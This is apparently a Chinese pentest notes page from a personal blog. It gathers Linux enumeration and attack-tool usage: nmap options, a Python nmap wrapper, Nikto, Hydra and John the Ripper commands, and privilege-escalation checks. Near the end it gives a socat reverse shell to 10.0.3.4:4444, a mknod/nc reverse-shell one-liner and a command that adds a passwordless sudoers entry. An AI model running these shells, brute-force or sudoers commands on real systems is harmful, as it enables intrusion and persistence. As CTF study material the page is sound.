文章归档

置顶文章

Web安全

Web安全基础

PHP相关

Writeups

靶机系列

HackTheBox

VulnHub

代码审计

PHP代码审计

流量分析

机器学习

基础学习

Python

Python编程

Java

Java编程

算法

Leetcode

随笔

经验

技术

 2020-03-26   2k

更新中…

Linux Enumeration

信息搜集

Nmap

使用手册:https://www.stationx.net/nmap-cheat-sheet/

常用参数

Target Selection:

nmap 192.168.0.1(scanning a single ip address)
nmap ca0y1h.top(scanning an url directly)
nmap 192.168.0.0/24(scan a range of IPs (192.168.0.0-255))
nmap -iL list-of-ips.txt(scan a list of ip)

Port Selection:

nmap 127.0.0.1 -p 22(scanning the default SSH port)
nmap 127.0.0.1 -p 1-1024(scanning ports 1 2 3…1024)
nmap 127.0.0.1 -F(scanning the most 100 common ports (80,22,21,443,etc))
nmap 127.0.0.1 -F --top-ports 30000
nmap 127.0.0.1 -p-(all ports)

Port Scan Types:

nmap 127.0.0.1 -sT (using TCP (used by default))
nmap 127.0.0.1 -sS (TCP SYN scan)
nmap 127.0.0.1 -sU (UDP ports)
nmap 127.0.0.1 -Pn -F (skip the initial ping step)

Service & OS Detection

nmap 127.0.0.1 -A(detect OS & services)
nmap 127.0.0.1 -sV(enumerate versions)
nmap 127.0.0.1 -sC(using default scripts)
nmap 127.0.0.1 -sV --version-intensity 5(Aggressive service detection)
nmap 127.0.0.1 -sV --version-intensity 0(Light banner grabbing detection)

nmap 127.0.0.1 -T0(paranoid detection evasion)
nmap 127.0.0.1 -T1(sneaky detection evasion)
nmap 127.0.0.1 -T2(polite (slows down scan, less bandwidth & less target ressources))
nmap 127.0.0.1 -T3(default speed)
nmap 127.0.0.1 -T4(Aggressive (fast & reliable network))
nmap 127.0.0.1 -T5(Insane speeds (assumes low ping and high bandwidth))

nmap 127.0.0.1 --host-timeout 1h 2m 3s(sets timeout to 1hr2min3sec)
nmap 127.0.0.1 --min-parallelism 10(minimal probe parallelization)
nmap 127.0.0.1 --max-parallelism 50(maximal ^)
nmap 127.0.0.1 --max-retries 3
nmap 127.0.0.1 --min-rate (send packets at least _ per second)

Python Script Scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
#!/usr/bin/python3

import subprocess

ip = input("[+]Target IP: ")

ippsec = "ippsec_scan.txt"
service = "service_scan.txt"
script = "script_scan.txt"
all_tcp = "all_tcp_scan.txt"
all_udp = "all_tcp_scan.txt"


def ippsec_scan(ip):
print("[!] Starting ippsec_scan ")
subprocess.run(["nmap", "-sC", "-sV", "-oN", ippsec, ip])
print("[+] Done ")

def service_scan(ip):
print("[!] Starting service_scan ")
subprocess.run(["nmap", "-A", "-p-", "-oN", service, ip])
print("[+] Done ")

def script_scan(ip):
print("[!] Starting script_scan ")
subprocess.run(["nmap", "--script", "discovery, safe, vuln", "-oN", script, ip])
print("[+] Done ")

def alltcp_scan(ip):
print("[!] Starting all_tcp_scan ")
subprocess.run(["nmap", "-p-", "-oN", all_tcp, ip])
print("[+] Done ")

def alludp_scan(ip):
print("[!] Starting all_udp_scan ")
subprocess.run(["nmap", "-p-", "-sU", "-oN", all_udp, ip])
print("[+] Done ")

if __name__ == '__main__':
ippsec_scan(ip)
service_scan(ip)
script_scan(ip)
alltcp_scan(ip)
alludp_scan(ip)

Netdiscover

Nikto

项目地址:https://github.com/sullo/nikto

工具介绍:perl语言开发的开源WEB安全扫描器;识别网站软件版本;搜索存在安全隐患的文件;检查服务器配置漏洞;检查WEB Application层面的安全隐患;避免404误判依据响应文件内容判断,不同扩展名的文件404响应内容不同。

常用命令:

1
2
3
4
5
6
7
8
Nikto -host http://1.1.1.1 #扫描目标:域名方式;
Nikto -host http://1.1.1.1 -output #扫描并输出结果
Nikto -host 1.1.1.1 -port 80 #扫描目标:ip地址加端口号
Nikto -host www.baidu.com -port 443 -ssl #扫描https网站
Nikto -host 文件名.txt #批量扫描目标
nmap -p80 192.168.1.0/24 -oG - | nikto -host - #利用nmap扫描开放80端口的IP段并且oG(nmap结果输出并整理)通过管道的方式“|”用nikto进行扫描
nikto -host 192.168.0.1 -useproxy http://localhost:8070 #利用代理进行扫描
-vhost #当一个网站存在多个端口时可以使用-vhost遍历所有网站进行扫描或一个ip对应多个网站

GitHack

项目地址:https://github.com/lijiejie/GitHack

工具介绍:GitHack是一个.git泄露利用脚本,通过泄露的.git文件夹下的文件,重建还原工程源代码。

渗透测试人员、攻击者,可以进一步审计代码,挖掘:文件上传,SQL注射等web安全漏洞。

dirb

Wfuzz

项目地址:https://wfuzz.readthedocs.io/en/latest/

工具介绍:wfuzz是一个基于Python的Web爆破程序,它支持多种方法来测试WEB应用的漏洞。你可以审计参数、登录认证、GET/POST方式爆破的表单,并且可以发掘未公开的资源,比如目录、文件和头部之类的。

使用手册:https://www.fuzzer.xyz/2019/03/29/WFUZZ使用教程/

subDomainBrute

项目地址:https://github.com/lijiejie/subDomainsBrute

工具介绍:本工具用于渗透测试目标域名收集。高并发DNS暴力枚举,发现其他工具无法探测到的域名, 如Google,aizhan,fofa。

Pigat

项目地址:https://github.com/teamssix/pigat

工具介绍:被动信息收集聚合工具,该工具通过爬取目标URL在第三方网站比如备案查询网站、子域名查询网站的结果来对目标进行被动信息收集。

密码爆破

hash-identifier

项目地址:https://tools.kali.org/password-attacks/hash-identifier

工具介绍:hash-identifier是一款哈希算法识别工具。通过该工具,用户可以识别哈希值所使用的哈希算法。

hashcat

John The Ripper

项目地址:https://www.openwall.com/john/

使用示例:

1
/usr/share/john/ssh2john.py id_rsa > id_rsa.hash
1
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash

Hydra

项目地址:https://tools.kali.org/password-attacks/hydra

工具介绍:这款暴力密码破解工具相当强大,支持几乎所有协议的在线密码破解,其密码能否被破解关键在于字典是否足够强大。

详细使用方式:https://www.cnblogs.com/zhaijiahui/p/8371336.html

使用示例:

Web登录 GET方式

1
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
1
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php

Web登录 POST方式

https://null-byte.wonderhowto.com/how-to/hack-like-pro-crack-online-web-form-passwords-with-thc-hydra-burp-suite-0160643/

数字取证

Steghide

使用手册:http://steghide.sourceforge.net/documentation/manpage.php

常用命令:

隐写:

1
$ steghide embed -cf picture.jpg -ef secret.txt

提取:

1
$ steghide extract -sf picture.jpg

exiftool

项目地址:https://github.com/exiftool/exiftool

使用手册:https://www.jianshu.com/p/d76457799de1

提权脚本

LinEnum

项目地址:https://github.com/rebootuser/LinEnum

使用示例:./LinEnum.sh -s -k keyword -r report -e /tmp/ -t

参数:

  • -k Enter keyword
  • -e Enter export location
  • -t Include thorough (lengthy) tests
  • -s Supply current user password to check sudo perms (INSECURE)
  • -r Enter report name
  • -h Displays this help text

Running with no options = limited scans/no output file

  • -e Requires the user enters an output location i.e. /tmp/export. If this location does not exist, it will be created.
  • -r Requires the user to enter a report name. The report (.txt file) will be saved to the current working directory.
  • -t Performs thorough (slow) tests. Without this switch default ‘quick’ scans are performed.
  • -s Use the current user with supplied password to check for sudo permissions - note this is insecure and only really for CTF use!
  • -k An optional switch for which the user can search for a single keyword within many files (documented below).

pspy

项目地址:https://github.com/DominicBreuker/pspy

项目介绍:pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute. Great for enumeration of Linux systems in CTFs. Also great to demonstrate your colleagues why passing secrets as arguments on the command line is a bad idea.

提权命令

  • Find World Writable Folders

    1
    find / -xdev -type d -perm -0002 -ls 2> /dev/null
  • Find World Writable Files

    1
    find / -xdev -type f -perm -0002 -ls 2> /dev/null
  • Find SUIDs

    1
    find / -perm -4000 -user root -exec ls -ld {} \; 2> /dev/null
  • Find SGID

    1
    find / -perm -2000 -group root -exec ls -ld {} \; 2> /dev/null
  • DIstro Information

    1
    cat /etc/*-release
  • Check open ports

    1
    netstat -antup
  • Check processes

    1
    ps -elf
  • Process monitoring tool: pspy

    • Useful for monitoring chron jobs or any other scheduled jobs
  • Check processes running with root privileges

    1
    ps -elf | grep root
  • Check running services

    1
    cat /etc/services
  • Check installed packages

    1
    2
    dpkg -l
    rpm -qa
  • Check for sudo permissions

    1
    sudo -l
  • Check OS architecture

    1
    uname -a
  • Check cronjobs

    1
    cat /etc/cron*
  • Check fstab

    1
    cat /etc/fstab
  • Check network configuration

    1
    ip addr
  • Check contents of /etc/passwd

    1
    cat /etc/passwd
  • Using socat

    • Listen

      1
      $ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
    • Connect

      1
      $ socat file:`tty`,raw,echo=0 tcp-listen:4444
  • Reverse connection using mknod

    1
    mknod /tmp/backpipe p; /bin/sh 0< /tmp/backpipe | nc <ip> <port> 1> /tmp/backpipe; rm /tmp/backpipe
  • Check version of an installed application

    1
    dpkg -l <application name>
  • Sometimes checking /opt /tmp /var /usr might help.

  • Edit sudoers file and grant sudo access to the current user (www-data in this case) with no password

    1
    echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers

Reverse Shell

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

常用工具

SQLMAP

https://zerokeeper.com/web-security/sqlmap-usage-summary.html#

https://louisnie.github.io/2019/03/03/SQLMAP/

Copyright © ca01h 2019-2020 | 本站总访问量